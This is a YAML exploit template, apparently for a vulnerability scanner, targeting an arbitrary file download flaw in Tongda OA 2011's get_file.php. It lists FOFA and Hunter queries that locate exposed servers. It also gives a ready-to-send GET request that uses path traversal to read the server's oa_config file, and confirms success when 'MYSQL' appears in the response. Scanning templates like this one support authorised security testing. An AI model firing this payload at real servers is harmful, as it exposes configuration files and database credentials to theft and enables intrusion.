product: 通达OA
vName: 通达OA get_file.php 任意文件下载
type: 文件读取
vID: [ ]
level: 3
vDesc: 通达OA get_file.php文件存在任意文件下载漏洞，攻击者通过漏洞可以读取服务器敏感文件。
version: 通达OA2011
note: ''
search:
  FOFA: app="TDXK-通达OA"
  Hunter: app.name="通达 OA"
protocol: http
link: https://blog.csdn.net/qq_33331244/article/details/136154224
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - MYSQL
            logic: and